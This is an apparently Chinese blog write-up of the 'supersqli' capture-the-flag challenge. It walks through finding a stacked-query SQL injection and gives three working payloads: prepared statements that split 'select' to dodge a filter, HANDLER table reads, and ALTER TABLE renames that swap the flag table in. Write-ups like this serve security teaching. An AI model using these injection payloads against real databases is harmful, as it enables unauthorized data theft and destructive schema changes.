当前位置:网站首页>攻防世界(web篇)---supersqli
攻防世界(web篇)---supersqli
2022-06-12 18:51:00 【肖萧然】
文章目录
攻防世界(web篇)—supersqli
拿到题目后,发现是单引号报错字符型注入

order by 2的时候页面正常回显,order by 3的时候页面出错

接下来union查询,发现被过滤了很多语句

绕过过滤,下面有几种方法
堆叠查询+预编译
查表

查字段

采用预编译的方式查,但被过滤

strstr区分大小写
?inject=1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');Prepare xiao from @sql;EXECUTE xiao;

handler查询
handler语法


查询payload
?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first; --+

堆叠查询+改表名
原理解析
一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法
先把原来的words表名字改成别的,再将1919810931114514表的名字改为words
再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)
然后我们用1’ or 1=1 --+直接就能得到flag
修改payload
?inject=1';alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);











边栏推荐
- 看不懂Kotlin源码?从Contracts 函数说起~
- Hugo 博客搭建教程
- Leetcode 416. Split equal sum subset
- 数据库全量SQL分析与审计系统性能优化之旅
- How to modify the authorization of sina Weibo for other applications
- kali局域网ARP欺骗(arpspoof)并监听(mitmproxy)局域内其它主机上网记录
- How to break the black screen after cleaning the dust and applying silicone grease on the laptop?
- Analyzing mobx responsive refresh mechanism from source code
- Free measurement of rectangular card [manual drawing ROI] Based on Halcon
- Review of MySQL (IX): index
猜你喜欢

leetcode:6096. 咒语和药水的成功对数【排序 + 二分】

Redis (XXXII) - using redis as a distributed lock

Quickly copy the request in browser F12 to postman/ or generate the corresponding code of the relevant language

基于Halcon的螺栓螺丝部分划痕、腐蚀缺陷检测

数据库全量SQL分析与审计系统性能优化之旅
![Two months later, my second listing anniversary [June 2, 2022]](/img/55/6678659a552ba7dbace330d8b9c3ae.png)
Two months later, my second listing anniversary [June 2, 2022]
![leetcode:6094. Company name [group enumeration + cannot repeat set intersection + product Cartesian product (repeat indicates length)]](/img/6c/f42bbec7ff2ec0d104f1dd2c97eab6.png)
leetcode:6094. Company name [group enumeration + cannot repeat set intersection + product Cartesian product (repeat indicates length)]

uniapp使用阿里图标
![Free measurement of rectangular card [manual drawing ROI] Based on Halcon](/img/c5/d9109ed4024aff521e1788c63bff4e.png)
Free measurement of rectangular card [manual drawing ROI] Based on Halcon

On how to make digital transformation after the loan of large policy banks- Yixinhuachen
随机推荐
Experiment 10 Bezier curve generation - experiment improvement - interactive generation of B-spline curve
Review of MySQL (V): Joint table query and sub query
美团智能配送系统的运筹优化实战-笔记
Basic SQL statement - select (single table query)
Review of MySQL (VIII): Transactions
Uniapp uses the Ali Icon
Go package import mode member visibility
Wireshark basic commands
【0008】无序列表
论大型政策性银行贷后,如何数字化转型 ?-亿信华辰
232-CH579M学习开发-以太网例程-TCP服务器(项目应用封装,局域网或广域网测试)
Enhanced version of unit test code displayed by SAP e-commerce cloud Spartacus UI checkout spinner
leetcode:6094. 公司命名【分组枚举 + 不能重复用set交集 + product笛卡儿积(repeat表示长度)】
吃饭咯 干锅肥肠 + 掌中宝!
国内如何下载Vega
leetcode:6096. Success logarithm of spells and potions [sort + dichotomy]
Kali LAN ARP Spoofing and monitoring other hosts' Internet access records in the LAN
Voir les pages du site
Free measurement of rectangular card [manual drawing ROI] Based on Halcon
wireshark基本使用命令